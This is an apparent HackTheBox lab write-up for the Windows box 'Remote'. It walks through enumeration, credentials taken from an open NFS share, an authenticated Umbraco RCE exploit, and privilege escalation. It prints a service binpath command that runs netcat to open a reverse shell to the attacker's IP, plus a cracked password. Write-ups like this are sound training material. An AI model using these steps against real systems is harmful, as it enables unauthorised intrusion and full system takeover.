Remote 10.10.10.180
It doesn’t matter how many times you get knocked down. All that matters is you get up one more time than you were knocked down. <Roy T. Bennett0 May 2020>
Competed on 30 May 2020

Background

Remote is a Windows machine from HackTheBox, that is focusing on the CVE exploitation technique, for training your ethical hacking skills and penetration testing skills.
According to the nmap result, a website is found that installed a vulnerable version of Umbraco CMS and an mountdnfs service is enabled. It can be exploited after we find the credentials from an exposed NFS share. A login credential is found at a file that saves in this NFS share, the credential can be used to log into the Umbraco CMS. An authenticated Umbraco CMS exploitation is found to gain initial access.
Based on the result of the WinPEAS, there is a possible local privilege escalation vector on a full access service named UsoSvc. Modifying the binpath of the service return the reverse shell with administrator privilege.
Target Machine: 10.10.10.180
Attacker Machine: 10.10.14.8

Hacking Process Part 0 – Service Reconnaissance

Quick Pre-searching

nmap -Pn -p- -T5 --min-rate=1000 10.10.10.180 -oG fkclai.nmap

Details Analysis

1
[email protected]: ~/Documents/ctf/htb/windows/12_Remote# nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.192 -o nmap-result.txt
2
3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-06 17:49 IST
4
Nmap scan report for 10.10.10.180
5
Host is up (0.21s latency).
6
7
PORT STATE SERVICE VERSION
8
21/tcp open ftp Microsoft ftpd
9
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
10
| ftp-syst:
11
|_ SYST: Windows_NT
12
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
13
|_http-title: Home - Acme Widgets
14
111/tcp open rpcbind 2-4 (RPC #100000)
15
| rpcinfo:
16
| program version port/proto service
17
| 100000 2,3,4 111/tcp rpcbind
18
| 100000 2,3,4 111/tcp6 rpcbind
19
| 100000 2,3,4 111/udp rpcbind
20
| 100000 2,3,4 111/udp6 rpcbind
21
| 100003 2,3 2049/udp nfs
22
| 100003 2,3 2049/udp6 nfs
23
| 100003 2,3,4 2049/tcp nfs
24
| 100003 2,3,4 2049/tcp6 nfs
25
| 100005 1,2,3 2049/tcp mountd
26
| 100005 1,2,3 2049/tcp6 mountd
27
| 100005 1,2,3 2049/udp mountd
28
| 100005 1,2,3 2049/udp6 mountd
29
| 100021 1,2,3,4 2049/tcp nlockmgr
30
| 100021 1,2,3,4 2049/tcp6 nlockmgr
31
| 100021 1,2,3,4 2049/udp nlockmgr
32
| 100021 1,2,3,4 2049/udp6 nlockmgr
33
| 100024 1 2049/tcp status
34
| 100024 1 2049/tcp6 status
35
| 100024 1 2049/udp status
36
|_ 100024 1 2049/udp6 status
37
135/tcp open msrpc Microsoft Windows RPC
38
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
39
445/tcp open microsoft-ds?
40
2049/tcp open mountd 1-3 (RPC #100005)
41
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
42
|_http-server-header: Microsoft-HTTPAPI/2.0
43
|_http-title: Not Found
44
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
45
|_http-server-header: Microsoft-HTTPAPI/2.0
46
|_http-title: Not Found
47
49664/tcp open msrpc Microsoft Windows RPC
48
49665/tcp open msrpc Microsoft Windows RPC
49
49666/tcp open msrpc Microsoft Windows RPC
50
49667/tcp open msrpc Microsoft Windows RPC
51
49678/tcp open msrpc Microsoft Windows RPC
52
49679/tcp open msrpc Microsoft Windows RPC
53
49680/tcp open msrpc Microsoft Windows RPC
54
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
55
56
Host script results:
57
|_clock-skew: 1m09s
58
| smb2-security-mode:
59
| 2.02:
60
|_ Message signing enabled but not required
61
| smb2-time:
62
| date: 2020-09-06T12:21:19
63
|_ start_date: N/A
64
65
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
66
Nmap done: 1 IP address (1 host up) scanned in 190.81 seconds
Copied!

Enumeration strategies

According to the nmap result, the following interesting ports are found for further investigation
    1.
    FTP (21)
    2.
    Website (80)
    3.
    NFS (2049)

Hacking Process Part 1 – Enumeration

FTP - 21

Using the credentials anonymous/anonymous to log in to the FTP service successful, but nothing can be found or download from this account.

Website - 80

Going to the website and nothing interesting items can be found. Using the gobuster to check any hidden folder/subdirectory, a list of interesting
gobuster dir --url=http://10.10.10.180/ -- wordlist=/usr/share/wordlists/dirb/common.txt
1
2
_|. _ _ _ _ _ _|_ v0.3.9
3
(_||| _) (/_(_|| (_| )
4
5
Extensions: | HTTP method: GET | Suffixes: php, asp, aspx, jsp, js, do, action, html, json, yml, yaml, xml, cfg, bak, txt, md, sql, zip, tar.gz, tgz | Threads: 10 | Wordlist size: 4614 | Request count: 4614
6
7
Error Log: /opt/dirsearch/logs/errors-20-09-06_17-53-02.log
8
9
Target: http://10.10.10.180
10
11
Output File: /opt/dirsearch/reports/10.10.10.180/20-09-06_17-53-02
12
13
[17:53:02] Starting:
14
[17:53:08] 200 - 7KB - /
15
[17:53:18] 200 - 5KB - /about-us
16
[17:53:25] 200 - 5KB - /blog
17
[17:53:25] 200 - 5KB - /Blog
18
[17:53:34] 200 - 8KB - /contact
19
[17:53:34] 200 - 8KB - /Contact
20
[17:53:56] 200 - 7KB - /home
21
[17:53:56] 200 - 7KB - /Home
22
[17:54:00] 302 - 126B - /install -> /umbraco/
23
[17:54:01] 200 - 3KB - /intranet
24
[17:54:10] 500 - 3KB - /master
25
[17:54:21] 200 - 7KB - /people
26
[17:54:21] 200 - 7KB - /People
27
[17:54:23] 200 - 3KB - /person
28
[17:54:28] 500 - 3KB - /product
29
[17:54:28] 200 - 5KB - /products
30
[17:54:28] 200 - 5KB - /Products
31
[17:54:55] 200 - 4KB - /umbraco
Copied!
An administrative page is found, we cannot log into the system using some default accounts such as admin/admin. Move to next for further checking.

NFS - 2049

Using showmounttool to check which NFS share is accessible by who
The site_backupsis available to mount and is accessible to everyone, let’s mount it and further enumerate.
Check the folder one by one and found that a file named mbraco.sdfinside the folder/App_Data which contains credentials at the top of the file.
1
strings Umbraco.sdf | head
2
Administratoradmindefaulten-US
3
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
4
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
5
[email protected]{"hashAlgorithm":"SHA1"}[email protected]
6
[email protected]{"hashAlgorithm":"SHA1"}[email protected]
7
Copied!
Crack the password which SHA1 hash b8be16afba8c314ad33d812f22a04991b90e2aaausing an online hash decrypting service. Finally, get the credentials user id: [email protected] and password baconandcheese

Hacking Process Part 2 – Initial Low Privilege Access

Let login to Umbraco CMS with the credentials found [email protected] / baconandcheese.
Just checked the version is Umbraco 7.12.4, google any vulunerability found at the exploit DB.
This version suffers from an authenticated remote code execution vulnerability. Download the exploit and modify the login details as below.
1
...
2
3
password="baconandcheese";
4
host = "http://10.10.10.180";
5
...
Copied!
In order to get the reversed TCP shell, the payload is changed to download a netcat 64 bits Windows version.
Next, stand up a listener on port 80 and run the exploit.
Change the payload again to start the reversed TCP shell to my Kali machine
Start the listening port at my Kali machine, the reverse shell is returned.
The user flag can be found in the C:\Users\Public folder.

Hacking Process Part 3 – Privilege Escalation

Start from gathering the system information
whoami /priv
systeminfo
Result of the winPEAS.exe, discover possible local privilege escalation vectors, shows the full access of a service named as UsoSvC
1
[+] Modifiable Services
2
[?] Check if you can modify any service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
3
LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
4
UsoSvc: AllAccess, Start
Copied!
Because of the full access to UsoSvc service, we can modify the binpath of the service and pop us a reverse shell.
1
sc.exe stop UsoSvc
2
sc config UsoSvc binpath= "C:\windows\temp\nc.exe -nv 10.10.14.6 1235 -e C:\WINDOWS\System32\cmd.exe"
3
sc.exe qc usosvc
Copied!

Recommendation

Several known vulnerability is found on this box that makes us can finish the game easily. It is told us that system patching is the most important preventive action to defect cyber attack.

Reference Link

PEASS-ng/winPEAS/winPEASexe at master · carlospolop/PEASS-ng
GitHub
Last modified 10mo ago